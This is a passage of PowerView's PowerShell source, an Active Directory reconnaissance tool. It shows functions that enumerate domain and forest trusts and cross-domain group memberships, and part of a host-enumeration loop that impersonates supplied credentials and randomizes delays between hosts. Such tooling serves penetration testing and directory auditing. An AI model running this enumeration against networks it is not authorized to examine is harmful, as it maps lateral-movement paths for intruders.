@NetLocalGroupMemberArguments\n                }\n            }\n\n            if ($TokenHandle) {\n                Invoke-RevertToSelf\n            }\n        }\n\n        $LogonToken = $Null\n        if ($PSBoundParameters['Credential']) {\n            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential\n            }\n            else {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken\n            }\n        }\n        else {\n            Write-Verbose \"[Find-DomainLocalGroupMember] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'GroupName' = $GroupName\n                'Method' = $Method\n                'TokenHandle' = $LogonToken\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\n########################################################\n#\n# Domain trust functions below.\n#\n########################################################\n\nfunction Get-DomainTrust {\n<#\n.SYNOPSIS\n\nReturn all domain trusts for the current domain or a specified domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect  \n\n.DESCRIPTION\n\nThis function will enumerate domain trust relationships for the current (or a remote)\ndomain using a number of methods. By default, and LDAP search using the filter\n'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified\nLDAP is used as well. If the -NET flag is specified, the .NET method\nGetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain\nobject. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is\nused to enumerate instead.\n\n.PARAMETER Domain\n\nSpecifies the domain to query for trusts, defaults to the current domain.\n\n.PARAMETER API\n\nSwitch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in\n.NET methods.\n\n.PARAMETER NET\n\nSwitch. Use .NET queries to enumerate trusts instead of the default LDAP method.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainTrust\n\nReturn domain trusts for the current domain using built in .LDAP methods.\n\n.EXAMPLE\n\nGet-DomainTrust -NET -Domain \"prod.testlab.local\"\n\nReturn domain trusts for the \"prod.testlab.local\" domain using .NET methods\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainTrust -Domain \"prod.testlab.local\" -Server \"PRIMARY.testlab.local\" -Credential $Cred\n\nReturn domain trusts for the \"prod.testlab.local\" domain enumerated through LDAP\nqueries, binding to the PRIMARY.testlab.local server for queries, and using the specified\nalternate credenitals.\n\n.EXAMPLE\n\nGet-DomainTrust -API -Domain \"prod.testlab.local\"\n\nReturn domain trusts for the \"prod.testlab.local\" domain enumerated through API calls.\n\n.OUTPUTS\n\nPowerView.DomainTrust.LDAP\n\nCustom PSObject with translated domain LDAP trust result fields (default).\n\nPowerView.DomainTrust.NET\n\nA TrustRelationshipInformationCollection returned when using .NET methods.\n\nPowerView.DomainTrust.API\n\nCustom PSObject with translated domain API trust result fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.DomainTrust.NET')]\n    [OutputType('PowerView.DomainTrust.LDAP')]\n    [OutputType('PowerView.DomainTrust.API')]\n    [CmdletBinding(DefaultParameterSetName = 'LDAP')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Parameter(ParameterSetName = 'API')]\n        [Switch]\n        $API,\n\n        [Parameter(ParameterSetName = 'NET')]\n        [Switch]\n        $NET,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Parameter(ParameterSetName = 'API')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Parameter(ParameterSetName = 'LDAP')]\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $TrustAttributes = @{\n            [uint32]'0x00000001' = 'NON_TRANSITIVE'\n            [uint32]'0x00000002' = 'UPLEVEL_ONLY'\n            [uint32]'0x00000004' = 'FILTER_SIDS'\n            [uint32]'0x00000008' = 'FOREST_TRANSITIVE'\n            [uint32]'0x00000010' = 'CROSS_ORGANIZATION'\n            [uint32]'0x00000020' = 'WITHIN_FOREST'\n            [uint32]'0x00000040' = 'TREAT_AS_EXTERNAL'\n            [uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION'\n            [uint32]'0x00000100' = 'TRUST_USES_AES_KEYS'\n            [uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'\n            [uint32]'0x00000400' = 'PIM_TRUST'\n        }\n\n        $LdapSearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $LdapSearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$LdapSearcherArguments['Obfuscate'] = $Obfuscate }\n\n        $NetSearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SSL']) { $NetSearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$NetSearcherArguments['Obfuscate'] = $Obfuscate }\n\n    }\n\n    PROCESS {\n        if ($PsCmdlet.ParameterSetName -ne 'API') {\n            if ($Domain -and $Domain.Trim() -ne '') {\n                $SourceDomain = $Domain\n            }\n            else {\n                if ($PSBoundParameters['Credential']) {\n                    $SourceDomain = (Get-Domain -Credential $Credential).Name\n                }\n                else {\n                    $SourceDomain = (Get-Domain).Name\n                }\n            }\n        }\n        elseif ($PsCmdlet.ParameterSetName -ne 'NET') {\n            if ($Domain -and $Domain.Trim() -ne '') {\n                $SourceDomain = $Domain\n            }\n            else {\n                $SourceDomain = $Env:USERDNSDOMAIN\n            }\n        }\n\n        if ($PsCmdlet.ParameterSetName -eq 'LDAP') {\n            # if we're searching for domain trusts through LDAP/ADSI\n            $SourceSID = Get-DomainSID @NetSearcherArguments\n\n\n            $Results = Invoke-LDAPQuery @LdapSearcherArguments -LDAPFilter \"(objectClass=trustedDomain)\"\n            $Results | Where-Object {$_} | ForEach-Object {\n                if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                    $Props = @{}\n                    foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                        if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'securityidentifier')) {\n                            $Props[$a] = $_.Attributes[$a]\n                        }\n                        else {\n                            $Values = @()\n                            foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                            }\n                            $Props[$a] = $Values\n                        }\n                    }\n                }\n                else {\n                    $Props = $_.Properties\n                }\n\n                $DomainTrust = New-Object PSObject\n\n                $TrustAttrib = @()\n                $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] }\n\n                $Direction = Switch ($Props.trustdirection) {\n                    0 { 'Disabled' }\n                    1 { 'Inbound' }\n                    2 { 'Outbound' }\n                    3 { 'Bidirectional' }\n                }\n\n                $TrustType = Switch ($Props.trusttype) {\n                    1 { 'WINDOWS_NON_ACTIVE_DIRECTORY' }\n                    2 { 'WINDOWS_ACTIVE_DIRECTORY' }\n                    3 { 'MIT' }\n                }\n\n                $Distinguishedname = $Props.distinguishedname[0]\n                $SourceNameIndex = $Distinguishedname.IndexOf('DC=')\n                if ($SourceNameIndex) {\n                    $SourceDomain = $($Distinguishedname.SubString($SourceNameIndex)) -replace 'DC=','' -replace ',','.'\n                }\n                else {\n                    $SourceDomain = \"\"\n                }\n\n                $TargetNameIndex = $Distinguishedname.IndexOf(',CN=System')\n                if ($SourceNameIndex) {\n                    $TargetDomain = $Distinguishedname.SubString(3, $TargetNameIndex-3)\n                }\n                else {\n                    $TargetDomain = \"\"\n                }\n\n                $ObjectGuid = New-Object Guid @(,$Props.objectguid[0])\n                $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value\n\n                $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain\n                $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0]\n                # $DomainTrust | Add-Member Noteproperty 'TargetGuid' \"{$ObjectGuid}\"\n                $DomainTrust | Add-Member Noteproperty 'TrustType' $TrustType\n                $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $($TrustAttrib -join ',')\n                $DomainTrust | Add-Member Noteproperty 'TrustDirection' \"$Direction\"\n                $DomainTrust | Add-Member Noteproperty 'WhenCreated' $Props.whencreated[0]\n                $DomainTrust | Add-Member Noteproperty 'WhenChanged' $Props.whenchanged[0]\n                $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP')\n                $DomainTrust\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainTrust] Error disposing of the Results object: $_\"\n                }\n            }\n        }\n        elseif ($PsCmdlet.ParameterSetName -eq 'API') {\n            # if we're searching for domain trusts through Win32 API functions\n            if ($PSBoundParameters['Server']) {\n                $TargetDC = $Server\n            }\n            elseif ($Domain -and $Domain.Trim() -ne '') {\n                $TargetDC = $Domain\n            }\n            else {\n                # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior\n                $TargetDC = $Null\n            }\n\n            # arguments for DsEnumerateDomainTrusts\n            $PtrInfo = [IntPtr]::Zero\n\n            # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND\n            $Flags = 63\n            $DomainCount = 0\n\n            # get the trust information from the target server\n            $Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount)\n\n            # Locate the offset of the initial intPtr\n            $Offset = $PtrInfo.ToInt64()\n\n            # 0 = success\n            if (($Result -eq 0) -and ($Offset -gt 0)) {\n\n                # Work out how much to increment the pointer by finding out the size of the structure\n                $Increment = $DS_DOMAIN_TRUSTS::GetSize()\n\n                # parse all the result structures\n                for ($i = 0; ($i -lt $DomainCount); $i++) {\n                    # create a new int ptr at the given offset and cast the pointer as our result structure\n                    $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset\n                    $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS\n\n                    $Offset = $NewIntPtr.ToInt64()\n                    $Offset += $Increment\n\n                    $SidString = ''\n                    $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                    if ($Result -eq 0) {\n                        Write-Verbose \"[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n                    }\n                    else {\n                        $DomainTrust = New-Object PSObject\n                        $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain\n                        $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName\n                        $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName\n                        $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags\n                        $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex\n                        $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType\n                        $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes\n                        $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString\n                        $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid\n                        $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API')\n                        $DomainTrust\n                    }\n                }\n                # free up the result buffer\n                $Null = $Netapi32::NetApiBufferFree($PtrInfo)\n            }\n            else {\n                Write-Verbose \"[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)\"\n            }\n        }\n        else {\n            # if we're searching for domain trusts through .NET methods\n            $FoundDomain = Get-Domain @NetSearcherArguments\n            if ($FoundDomain) {\n                $FoundDomain.GetAllTrustRelationships() | ForEach-Object {\n                    $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET')\n                    $_\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-ForestTrust {\n<#\n.SYNOPSIS\n\nReturn all forest trusts for the current forest or a specified forest.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Forest  \n\n.DESCRIPTION\n\nThis function will enumerate domain trust relationships for the current (or a remote)\nforest using number of method using the .NET method GetAllTrustRelationships() on a\nSystem.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.\n\n.PARAMETER Forest\n\nSpecifies the forest to query for trusts, defaults to the current forest.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-ForestTrust\n\nReturn current forest trusts.\n\n.EXAMPLE\n\nGet-ForestTrust -Forest \"external.local\"\n\nReturn trusts for the \"external.local\" forest.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-ForestTrust -Forest \"external.local\" -Credential $Cred\n\nReturn trusts for the \"external.local\" forest using the specified alternate credenitals.\n\n.OUTPUTS\n\nPowerView.DomainTrust.NET\n\nA TrustRelationshipInformationCollection returned when using .NET methods (default).\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ForestTrust.NET')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Forest,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $NetForestArguments = @{}\n        if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest }\n        if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential }\n\n        $FoundForest = Get-Forest @NetForestArguments\n\n        if ($FoundForest) {\n            $FoundForest.GetAllTrustRelationships() | ForEach-Object {\n                $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET')\n                $_\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainForeignUser {\n<#\n.SYNOPSIS\n\nEnumerates users who are in groups outside of the user's domain.\nThis is a domain's \"outgoing\" access.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain, Get-DomainUser  \n\n.DESCRIPTION\n\nUses Get-DomainUser to enumerate all users for the current (or target) domain,\nthen calculates the given user's domain name based on the user's distinguishedName.\nThis domain name is compared to the queried domain, and the user object is\noutput if they differ.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainForeignUser\n\nReturn all users in the current domain who are in groups not in the\ncurrent domain.\n\n.EXAMPLE\n\nGet-DomainForeignUser -Domain dev.testlab.local\n\nReturn all users in the dev.testlab.local domain who are in groups not in the\ndev.testlab.local domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred\n\nReturn all users in the dev.testlab.local domain who are in groups not in the\ndev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and\nusing the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.ForeignUser\n\nCustom PSObject with translated user property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ForeignUser')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        $SearcherArguments['LDAPFilter'] = '(memberof=*)'\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }\n    }\n\n    PROCESS {\n        Get-DomainUser @SearcherArguments  | ForEach-Object {\n            ForEach ($Membership in $_.memberof) {\n                $Index = $Membership.IndexOf('DC=')\n                if ($Index) {\n\n                    $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.'\n                    $UserDistinguishedName = $_.distinguishedname\n                    $UserIndex = $UserDistinguishedName.IndexOf('DC=')\n                    $UserDomain = $($_.distinguishedname.SubString($UserIndex)) -replace 'DC=','' -replace ',','.'\n\n                    if ($GroupDomain -ne $UserDomain) {\n                        # if the group domain doesn't match the user domain, display it\n                        $GroupName = $Membership.Split(',')[0].split('=')[1]\n                        $ForeignUser = New-Object PSObject\n                        $ForeignUser | Add-Member Noteproperty 'UserDomain' $UserDomain\n                        $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname\n                        $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname\n                        $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain\n                        $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName\n                        $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership\n                        $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser')\n                        $ForeignUser\n                    }\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainForeignGroupMember {\n<#\n.SYNOPSIS\n\nEnumerates groups with users outside of the group's domain and returns\neach foreign member. This is a domain's \"incoming\" access.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain, Get-DomainGroup  \n\n.DESCRIPTION\n\nUses Get-DomainGroup to enumerate all groups for the current (or target) domain,\nthen enumerates the members of each group, and compares the member's domain\nname to the parent group's domain name, outputting the member if the domains differ.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainForeignGroupMember\n\nReturn all group members in the current domain where the group and member differ.\n\n.EXAMPLE\n\nGet-DomainForeignGroupMember -Domain dev.testlab.local\n\nReturn all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred\n\nReturn all group members in the dev.testlab.local domain where the member is\nnot in dev.testlab.local. binding to the secondary.dev.testlab.local for\nqueries, and using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.ForeignGroupMember\n\nCustom PSObject with translated group member property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ForeignGroupMember')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        $SearcherArguments['LDAPFilter'] = '(member=*)'\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if 